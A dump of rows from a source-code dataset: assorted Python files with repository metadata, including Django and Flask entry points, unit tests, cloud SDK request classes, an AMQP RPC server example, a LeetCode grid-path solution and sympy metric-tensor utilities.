|
/wsgi.py
|
75ad6b25013956a7af77660d24fbd9058b5cb79c
|
[] |
no_license
|
socek/tklive2013
|
dfa896800713832d3f1b4a11f35aecf723e09328
|
2fa8c6fd099a66b7f84fc5df94d0a2b542a44f75
|
refs/heads/master
| 2021-01-22T05:16:34.001073
| 2013-02-25T13:14:43
| 2013-02-25T13:14:43
| 42,201,372
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 345
|
py
|
#!/home/socek/www/2013.turniejkosza.pl/venv/bin/python
import os, sys
sys.path.append('/home/socek/www/2013.turniejkosza.pl/tklive')
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings' # this is your settings.py file
os.environ['PYTHON_EGG_CACHE'] = '/tmp'
import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()
|
[
"msocek@gmail.com"
] |
msocek@gmail.com
|
253c9632016a2b5d45b61ace6d16cc791687be0b
|
20f2f9c4728cc8380062c557b838af45d65b909b
|
/tests/basetypes.py
|
ad5a3e8fe487b3e4dd897fef64492948ff945397
|
[] |
no_license
|
dankamongmen/everpad
|
5cea529cab55f2c4a8f4fc5588807c35b2a61aef
|
4eea1d6c9b322cbad021453f3a0dc57582fb5c6a
|
refs/heads/master
| 2021-01-16T19:51:27.598790
| 2012-12-06T09:28:28
| 2012-12-06T09:37:13
| 7,032,105
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,317
|
py
|
import sys
sys.path.append('..')
from everpad.basetypes import Tag, DbusSendable
import unittest
class TestBaseTypes(unittest.TestCase):
def test_signature(self):
class Fake(DbusSendable):
fields = (
('id', 'i'),
('name', 's'),
)
self.assertEqual(
Fake.signature, '(is)',
'generate signature',
)
def test_serialise(self):
class Fake(object):
id = 0
name = '123'
tag = Tag.from_obj(Fake())
self.assertEqual(
tag.struct, (0, '123'),
'serialise to struct',
)
def test_load(self):
tag = Tag.from_tuple((0, '123'))
self.assertEqual(
tag.name, '123',
'load from struct',
)
def test_give(self):
class Fake(object):
id = 0
@property
def id_dbus(self):
return self.id
@id_dbus.setter
def id_dbus(self, val):
self.id = val + 12
tag = Tag.from_tuple((0, '123'))
obj = Fake()
tag.give_to_obj(obj)
self.assertEqual(
obj.id, 12,
'give data to object',
)
if __name__ == '__main__':
unittest.main()
|
[
"nvbn.rm@gmail.com"
] |
nvbn.rm@gmail.com
|
e2001593d3dace8fffbd229e25b81b7d1a5932c2
|
e54c04a919a21af0564c6d3f77c92c84a097e58b
|
/src/front-door/azext_front_door/vendored_sdks/models/frontend_endpoint_link_py3.py
|
2777bd8e09b27cfb2d1604822a29b8ac26415ee0
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
rlrossiter/azure-cli-extensions
|
b8b4acad5394edbff545f4fd145cf24255db7453
|
e8a640e6623e69e21fa7118eceb1ae28d134bb9a
|
refs/heads/master
| 2021-08-06T18:17:29.141297
| 2019-09-22T13:37:04
| 2019-09-22T13:37:04
| 210,704,389
| 1
| 0
|
MIT
| 2019-09-24T21:56:44
| 2019-09-24T21:56:43
| null |
UTF-8
|
Python
| false
| false
| 905
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class FrontendEndpointLink(Model):
"""Defines the Resource ID for a Frontend Endpoint.
:param id: Resource ID.
:type id: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
}
def __init__(self, *, id: str=None, **kwargs) -> None:
super(FrontendEndpointLink, self).__init__(**kwargs)
self.id = id
|
[
"tjprescott@users.noreply.github.com"
] |
tjprescott@users.noreply.github.com
|
e165f515f5a8171ea465a2a3904e19bda27ebe4a
|
ad2090cc9591d38456621951d4901276481b55fd
|
/python编程技巧提高/day03/ex3_实现反向迭代.py
|
389dd1920cf2aee18456d949fadf7f3918a3afae
|
[] |
no_license
|
GuangGuangLi-Artist/LearningPython
|
9d17366c4b64f5b3d53b885b71f1cf9bd4d2f53f
|
0810ff6d0cc557f4d5ed8c024ce413a93183a6da
|
refs/heads/master
| 2023-08-18T16:32:03.595418
| 2023-07-30T09:47:48
| 2023-07-30T09:47:48
| 201,511,027
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 614
|
py
|
#coding=utf-8
class FloatRange():
def __init__(self,start,end,step=0.1):
self.start = start
self.end = end
self.step = step
def __iter__(self):
t = self.start
while t <= self.end:
yield t
t += self.step
def __reversed__(self):
t = self.end
while t >= self.start:
yield t
t -= self.step
if __name__ == '__main__':
'''正向迭代'''
# for x in FloatRange(1.0,4.0,0.5):
# print(x)
'''反向迭代'''
for x in reversed(FloatRange(1.0, 4.0, 0.5)):
print(x)
|
[
"15607521232@163.com"
] |
15607521232@163.com
|
6033d53dbc557f177f5618eb13bead953214860f
|
39d4504ec1da8975fac526d6801b94f4348b6b61
|
/official/utils/logs/hooks_helper_test.py
|
5adb5fdc343ad00cfab2557436de927e68501743
|
[
"Apache-2.0"
] |
permissive
|
vincentcheny/models
|
fe0ff5888e6ee00a0d4fa5ee14154acdbeebe7ad
|
afb1a59fc1bc792ac72d1a3e22e2469020529788
|
refs/heads/master
| 2020-07-23T21:38:24.559521
| 2019-11-15T07:50:11
| 2019-11-15T07:50:11
| 207,712,649
| 1
| 0
|
Apache-2.0
| 2019-09-11T03:12:31
| 2019-09-11T03:12:31
| null |
UTF-8
|
Python
| false
| false
| 2,777
|
py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for hooks_helper."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
import tensorflow as tf # pylint: disable=g-bad-import-order
from official.utils.logs import hooks_helper
from official.utils.misc import keras_utils
class BaseTest(unittest.TestCase):
  """Tests that hooks_helper.get_train_hooks validates names and builds hooks."""

  def setUp(self):
    super(BaseTest, self).setUp()
    # The hooks under test are estimator/graph-mode constructs; run the
    # tests with eager execution disabled when keras reports TF2.
    if keras_utils.is_v2_0:
      tf.compat.v1.disable_eager_execution()

  def test_raise_in_non_list_names(self):
    # A comma-separated string is rejected: hook names must be a list.
    with self.assertRaises(ValueError):
      hooks_helper.get_train_hooks(
          'LoggingTensorHook, ProfilerHook', model_dir="", batch_size=256)

  def test_raise_in_invalid_names(self):
    # Hook names not registered in hooks_helper raise ValueError.
    invalid_names = ['StepCounterHook', 'StopAtStepHook']
    with self.assertRaises(ValueError):
      hooks_helper.get_train_hooks(invalid_names, model_dir="", batch_size=256)

  def validate_train_hook_name(self,
                               test_hook_name,
                               expected_hook_name,
                               **kwargs):
    """Asserts that requesting test_hook_name yields exactly one hook whose
    class name (lower-cased) equals expected_hook_name."""
    returned_hook = hooks_helper.get_train_hooks(
        [test_hook_name], model_dir="", **kwargs)
    self.assertEqual(len(returned_hook), 1)
    self.assertIsInstance(returned_hook[0], tf.estimator.SessionRunHook)
    self.assertEqual(returned_hook[0].__class__.__name__.lower(),
                     expected_hook_name)

  def test_get_train_hooks_logging_tensor_hook(self):
    self.validate_train_hook_name('LoggingTensorHook', 'loggingtensorhook')

  def test_get_train_hooks_profiler_hook(self):
    self.validate_train_hook_name('ProfilerHook', 'profilerhook')

  def test_get_train_hooks_examples_per_second_hook(self):
    self.validate_train_hook_name('ExamplesPerSecondHook',
                                  'examplespersecondhook')

  def test_get_logging_metric_hook(self):
    test_hook_name = 'LoggingMetricHook'
    self.validate_train_hook_name(test_hook_name, 'loggingmetrichook')
if __name__ == '__main__':
  # Standard TensorFlow test entry point.
  tf.test.main()
|
[
"1155107977@link.cuhk.edu.hk"
] |
1155107977@link.cuhk.edu.hk
|
ad0e22e38a0cabad285892fabed6f049c4e102a0
|
ba9fc166ea9adb64e522471a4fc96e1810862516
|
/examples/simple_rpc_server.py
|
db4cdd58130f340bb9dc83a573bde92b1e461b2d
|
[
"MIT"
] |
permissive
|
martincolladodotcom/amqpstorm
|
30ca347234f86b653ea6c0327ba93b7d40b8dee6
|
8c320601b92482472f3e5fe366221fa276c49004
|
refs/heads/master
| 2021-08-07T13:52:53.570087
| 2017-11-08T07:54:59
| 2017-11-08T07:54:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,021
|
py
|
"""
RPC Server example based on code from the official RabbitMQ Tutorial.
http://www.rabbitmq.com/tutorials/tutorial-six-python.html
"""
import amqpstorm
from amqpstorm import Message
# Connect to a local broker as guest and declare the queue RPC requests
# arrive on. Module-level so both the callback and __main__ share them.
CONNECTION = amqpstorm.Connection('127.0.0.1', 'guest', 'guest')
CHANNEL = CONNECTION.channel()
CHANNEL.queue.declare(queue='rpc_queue')
def fib(number):
    """Return the *number*-th Fibonacci number (fib(0) == 0, fib(1) == 1).

    Iterative implementation: O(number) time and O(1) space, instead of the
    exponential naive double recursion.
    """
    previous, current = 0, 1
    for _ in range(number):
        previous, current = current, previous + current
    return previous
def on_request(message):
    """Handle one RPC request: compute fib of the payload and publish the reply.

    The reply carries the request's correlation_id and is published to the
    queue named in the request's reply_to field; the request is then acked.
    """
    requested = int(message.body)
    print(" [.] fib(%s)" % (requested,))
    reply_properties = {
        'correlation_id': message.correlation_id
    }
    reply = Message.create(message.channel, str(fib(requested)), reply_properties)
    reply.publish(message.reply_to)
    message.ack()
if __name__ == '__main__':
    # prefetch_count=1: take one request at a time so slow fib calls are
    # load-balanced across multiple server instances.
    CHANNEL.basic.qos(prefetch_count=1)
    CHANNEL.basic.consume(on_request, queue='rpc_queue')
    print(" [x] Awaiting RPC requests")
    # to_tuple=False delivers amqpstorm.Message objects to the callback.
    CHANNEL.start_consuming(to_tuple=False)
|
[
"me@eandersson.net"
] |
me@eandersson.net
|
9af698eb1b9e10126a05c34812ef09e3ca26db5f
|
c4079336265fcaa2eb8be72d5a755d2dd3c95b1c
|
/bin/service.py
|
114b11a3ee9f2e3e925d41730aab7de2ddb60201
|
[
"MIT"
] |
permissive
|
alexhsamuel/absence
|
3bdd5e9b6f20f995b4b71ffc6ad94c52c7757c59
|
2dcb1e14f4ec0d90b1dad3ca03ebba7fa5a3d3ff
|
refs/heads/master
| 2020-03-11T06:39:26.328341
| 2018-04-17T03:37:55
| 2018-04-17T03:37:55
| 129,835,861
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,848
|
py
|
#!/usr/bin/env python
import argparse
import flask
import logging
from pathlib import Path
import absence.api
import absence.api.service
from absence.db import SqliteDB
#-------------------------------------------------------------------------------

# Flask application exposing the absence API under /api/v1.
app = flask.Flask(__name__)
app.register_blueprint(absence.api.service.API, url_prefix="/api/v1")

logging.basicConfig(
    format ="%(asctime)s [%(levelname)-7s] %(name)s: %(message)s",
    datefmt ="%Y-%m-%dT%H:%M:%S",
)

# Command-line interface.
parser = argparse.ArgumentParser()
parser.add_argument(
    "--host", metavar="ADDR", default="localhost",
    help="serve on ADDR [def: localhost]")
parser.add_argument(
    "--port", metavar="PORT", type=int, default=absence.api.DEFAULT_PORT,
    help="serve on PORT [def: {}]".format(absence.api.DEFAULT_PORT))
parser.add_argument(
    "--repo", metavar="PATH", type=Path, default=Path("./repo"),
    help="use repo dir at PATH")
# NOTE(review): --initialize is parsed but never used below (--create-db
# serves that role for the database) — confirm whether it is still needed.
parser.add_argument(
    "--initialize", action="store_true", default=False,
    help="initialize repo if missing")
parser.add_argument(
    "--debug", action="store_true", default=False,
    help="run Werkzeug in debug mode")
parser.add_argument(
    "--log", metavar="LEVEL", default="INFO",
    help="log at LEVEL [def: INFO]")
parser.add_argument(
    "--db", metavar="FILE", default="./absence.sqlite",
    help="path to database")
parser.add_argument(
    "--create-db", action="store_true", default=False,
    help="create the database")
args = parser.parse_args()

logging.getLogger().setLevel(getattr(logging, args.log.upper()))

# We don't cache the database as SQLite connections are thead-specific.
# But either create or check it up front.
if args.create_db:
    SqliteDB.create(args.db)
else:
    SqliteDB.open(args.db)
app.db_path = args.db

# threaded=False because SQLite connections are thread-specific (see above).
app.run(host=args.host, port=args.port, debug=args.debug, threaded=False)
|
[
"alex@alexsamuel.net"
] |
alex@alexsamuel.net
|
9851e0e373c9fa6897b1f6abde21d140a495945e
|
b7620d0f1a90390224c8ab71774b9c906ab3e8e9
|
/aliyun-python-sdk-gpdb/aliyunsdkgpdb/request/v20160503/DescribeSQLLogsOnSliceRequest.py
|
6c001777dbc8db958ef3c54d9c3f181732da9bde
|
[
"Apache-2.0"
] |
permissive
|
YaoYinYing/aliyun-openapi-python-sdk
|
e9c62940baee1a35b9ec4a9fbd1e4eb0aaf93b2f
|
e9a93cc94bd8290d1b1a391a9cb0fad2e6c64627
|
refs/heads/master
| 2022-10-17T16:39:04.515562
| 2022-10-10T15:18:34
| 2022-10-10T15:18:34
| 117,057,304
| 0
| 0
| null | 2018-01-11T06:03:02
| 2018-01-11T06:03:01
| null |
UTF-8
|
Python
| false
| false
| 2,838
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkgpdb.endpoint import endpoint_data
class DescribeSQLLogsOnSliceRequest(RpcRequest):
    """RPC request for the GPDB ``DescribeSQLLogsOnSlice`` API (version 2016-05-03).

    Each get_/set_ pair below maps one query parameter of the API; the
    accessors delegate to the query-parameter dict maintained by RpcRequest.
    This accessor style matches the rest of the generated SDK.
    """

    def __init__(self):
        RpcRequest.__init__(self, 'gpdb', '2016-05-03', 'DescribeSQLLogsOnSlice')
        self.set_method('POST')
        # Endpoint data is attached only when the base class exposes the hooks.
        if hasattr(self, "endpoint_map"):
            setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
        if hasattr(self, "endpoint_regional"):
            setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())

    def get_SliceId(self): # String
        return self.get_query_params().get('SliceId')

    def set_SliceId(self, SliceId): # String
        self.add_query_param('SliceId', SliceId)

    def get_PageNumber(self): # Integer
        return self.get_query_params().get('PageNumber')

    def set_PageNumber(self, PageNumber): # Integer
        self.add_query_param('PageNumber', PageNumber)

    def get_MinExecuteCost(self): # String
        return self.get_query_params().get('MinExecuteCost')

    def set_MinExecuteCost(self, MinExecuteCost): # String
        self.add_query_param('MinExecuteCost', MinExecuteCost)

    def get_PageSize(self): # Integer
        return self.get_query_params().get('PageSize')

    def set_PageSize(self, PageSize): # Integer
        self.add_query_param('PageSize', PageSize)

    def get_DBInstanceId(self): # String
        return self.get_query_params().get('DBInstanceId')

    def set_DBInstanceId(self, DBInstanceId): # String
        self.add_query_param('DBInstanceId', DBInstanceId)

    def get_MaxExecuteCost(self): # String
        return self.get_query_params().get('MaxExecuteCost')

    def set_MaxExecuteCost(self, MaxExecuteCost): # String
        self.add_query_param('MaxExecuteCost', MaxExecuteCost)

    def get_ExecuteState(self): # String
        return self.get_query_params().get('ExecuteState')

    def set_ExecuteState(self, ExecuteState): # String
        self.add_query_param('ExecuteState', ExecuteState)

    def get_QueryId(self): # String
        return self.get_query_params().get('QueryId')

    def set_QueryId(self, QueryId): # String
        self.add_query_param('QueryId', QueryId)
|
[
"sdk-team@alibabacloud.com"
] |
sdk-team@alibabacloud.com
|
06c1b7128e4e03525c80978f40c0045334e11190
|
c5d68f58c9523257a8b41954553f5cff2cd5f487
|
/Secao_08_Lista_Ex_73e/ex_67.py
|
b48841401026d069e655abe6f4ea6e4a504e6079
|
[] |
no_license
|
SouzaCadu/guppe
|
04bfcde82d4404eb9ec795006c6931ba07dc72b6
|
1f8a672230c5c27712f522e1e34516591c012453
|
refs/heads/master
| 2023-03-13T01:32:51.019871
| 2021-02-25T17:02:59
| 2021-02-25T17:02:59
| 320,908,119
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,256
|
py
|
"""
faça uma rotina que receba como parâmetro um vetor de caracteres e
seu tamanho. a função deverá de ler uma string do teclado, caractere por caractere
usando a função getchat() até que o usuário digite enter ou o tamanho máximo do
vetor seja alcançado.
"""
def getchar():
    """Read one character from the user.

    :return: the character entered by the user (or the empty string when
        Enter is pressed alone). When more than one character is typed the
        function falls through and implicitly returns ``None``.
    """
    caractere = input("Informe um caractere: ")
    # NOTE(review): multi-character input returns None implicitly; callers
    # must handle that case.
    if len(caractere) <= 1:
        return caractere
def rotina(args, tamanho):
    """Fill *args* with up to *tamanho* characters read via getchar().

    Reading stops early when the user presses Enter without typing anything
    (empty string). Invalid reads — getchar() returns None when more than
    one character is entered — are skipped instead of being appended, so the
    vector only ever contains single characters.

    :param args: list (vector) to append the characters to
    :param tamanho: maximum number of characters to read
    :return: the same list, with the characters that were read appended
    """
    for _ in range(tamanho):
        valor = getchar()
        if valor == "":
            # Enter pressed with no character: stop reading.
            break
        if valor is not None:
            args.append(valor)
    return args
# Demonstration: read up to 8 characters into an initially empty vector.
vetor = []
tam = 8
print(rotina(vetor, tam))
|
[
"cadu.souza81@gmail.com"
] |
cadu.souza81@gmail.com
|
f2d735b073eda95981eb74d263efe7b8b08b0939
|
181af10fcf40b824fe92d3b8f72fd15d6d1490c2
|
/Contests/101-200/week 178/1368. Minimum Cost to Make at Least One Valid Path in a Grid/Minimum Cost to Make at Least One Valid Path in a Grid.py
|
c0f974e882a945b86410b30ef80cb3fbd07b4071
|
[] |
no_license
|
wangyendt/LeetCode
|
402c59a0b7b7f5b3a672231ea5dad8056ade36af
|
4a3ba15284c45b2d8bf38306c8c8526ae174615c
|
refs/heads/master
| 2023-08-10T06:27:54.995152
| 2023-08-10T02:22:27
| 2023-08-10T02:22:27
| 176,651,399
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 824
|
py
|
#!/usr/bin/env python
# encoding: utf-8
"""
@author: Wayne
@contact: wangye.hope@gmail.com
@software: PyCharm
@file: Minimum Cost to Make at Least One Valid Path in a Grid
@time: 2020/3/5 14:47
"""
class Solution:
    def minCost(self, A: list) -> int:
        """Return the minimum cost to make at least one valid path in grid A.

        0-1 BFS expressed as alternating layers: from every cell reachable at
        cost k, first follow the pre-existing arrows for free with a DFS, then
        pay cost 1 to redirect each frontier cell in any direction, starting
        layer k + 1.

        Cell values encode directions: 1=right, 2=left, 3=down, 4=up.
        """
        n, m, inf = len(A), len(A[0]), 10 ** 9
        k = 0  # cost of the layer currently being expanded
        dp = [[inf] * m for _ in range(n)]  # minimal cost to reach each cell
        # Direction vectors indexed by (cell value - 1): right, left, down, up.
        dirt = [[0, 1], [0, -1], [1, 0], [-1, 0]]
        bfs = []

        def dfs(x, y):
            # Follow free (cost-k) moves; stop at visited or out-of-range cells.
            if not (0 <= x < n and 0 <= y < m and dp[x][y] == inf):
                return
            dp[x][y] = k
            bfs.append([x, y])
            dfs(x + dirt[A[x][y] - 1][0], y + dirt[A[x][y] - 1][1])

        dfs(0, 0)
        while bfs:
            k += 1
            bfs, frontier = [], bfs
            # Pay cost 1 to point each frontier cell in any of the 4 directions.
            for x, y in frontier:
                for i, j in dirt:
                    dfs(x + i, y + j)
        return dp[-1][-1]
|
[
"905317742@qq.com"
] |
905317742@qq.com
|
70cfde39fc00d4c6dbdb49f823c1d203e72aeaa0
|
d09ad52c0911a83a5e5a03850bb5371d22446226
|
/metrics.py
|
c0c926ae23018f66d249ffebc51658a841faf430
|
[] |
no_license
|
hzfmer/pyawp
|
88d0ea24b47aa02a8ef4a89e59335b636a5c205b
|
aff564d59c1f00ada2755ab239980fbfa0a8d9cb
|
refs/heads/main
| 2023-05-08T07:37:53.603933
| 2021-05-27T18:51:56
| 2021-05-27T18:51:56
| 371,476,689
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,102
|
py
|
import sympy as sp
def covariant_basis(x, r):
    """Return the three covariant basis vectors of the mapping x(r).

    Arguments:
        x : list of physical-coordinate expressions in terms of `r`
        r : list of parameter coordinates (at least three are used)

    Returns:
        (a1, a2, a3) : tuple of component lists; the i-th entry of each list
        is the derivative of x[i] with respect to the corresponding parameter.
    """
    basis = [
        [sp.diff(component, coord) for component in x]
        for coord in (r[0], r[1], r[2])
    ]
    return tuple(basis)
def jacobian_matrix(a1, a2, a3):
    """Assemble the Jacobian matrix whose rows are the covariant basis vectors."""
    rows = [a1, a2, a3]
    return sp.Matrix(rows)
def contravariant_basis(J, a):
    """Return the contravariant basis dual to the covariant basis `a`.

    Arguments:
        J : determinant of the Jacobian (symbol or expression)
        a : covariant basis vectors (list of sympy column vectors)

    Returns:
        List of the three contravariant basis vectors, each the cross product
        of the other two covariant vectors (in cyclic order) divided by J.
    """
    cyclic = ((1, 2), (2, 0), (0, 1))
    return [a[j].cross(a[k]) / J for j, k in cyclic]
def metric_tensor(a):
    """Return the metric tensor G[i, j] = a[i] . a[j] for the basis `a`.

    Whether the result is the covariant or contravariant metric tensor
    depends on which basis vectors are passed in; either way the matrix is
    symmetric and positive definite.
    """
    dim = len(a)
    # Matrix(rows, cols, fn) fills entry (i, j) with fn(i, j).
    return sp.Matrix(dim, dim, lambda i, j: a[i].dot(a[j]))
def metrics(x, r, eval_J=0):
    """
    Compute metric coefficients for a mapping given physical coordinates `x`
    and parameter coordinates `r`.

    To use, specify x = [x1, x2, x3] for each xi, as a function of each ri,
    i.e., `x1 = f(r1,r2,r3)`, etc.

    Example:
        >> import sympy as sp
        >> f = sp.Function('f')(r1,r2)
        >> x1 = f

    Arguments:
    x      : List of physical coordinate expressions.
    r      : List of parameter coordinates.
    eval_J : If truthy, use the evaluated Jacobian determinant when forming
             the contravariant basis; otherwise keep it as the symbol `J`.

    Returns:
    a    : Covariant basis vectors (as sympy column matrices)
    b    : Contravariant basis vectors
    Ga   : Covariant metric tensor
    Gb   : Contravariant metric tensor
    Jmat : Jacobian matrix
    J    : Determinant of Jacobian matrix
    """
    a1, a2, a3 = covariant_basis(x, r)
    Jmat = jacobian_matrix(a1,a2,a3)
    J = Jmat.det()
    # Wrap the component lists as column matrices so cross/dot are available.
    a = [sp.Matrix(ai) for ai in [a1, a2, a3]]
    if eval_J:
        b = contravariant_basis(J, a)
    else:
        b = contravariant_basis(sp.symbols('J'), a)
    Ga = metric_tensor(a)
    Gb = metric_tensor(b)
    return a, b, Ga, Gb, Jmat, J
def christoffel(a, b, r):
    r"""
    Compute the Christoffel symbols:

    \Gamma^k_{ij} = a^k \cdot \frac{\partial a_i}{\partial r^j}

    Input arguments:
    a : Covariant basis vectors
    b : Contravariant basis vectors
    r : Coordinates

    Returns:
    Gam : Christoffel symbols as an array of matrices. Symbol is defined as
          `Gam[k][i,j]`.
    """
    m = len(a)
    Gam = [0]*m
    for k in range(m):
        Gam[k] = sp.zeros(m)
        for i in range(m):
            for j in range(m):
                # Dot the k-th contravariant vector with d(a_i)/d(r^j),
                # built component-wise since a[i] is a column matrix.
                Gam[k][i,j] = b[k].dot([sp.diff(a[i][l], r[j]) \
                    for l in range(m)])
    return Gam
|
[
"hzfmer94@gmail.com"
] |
hzfmer94@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.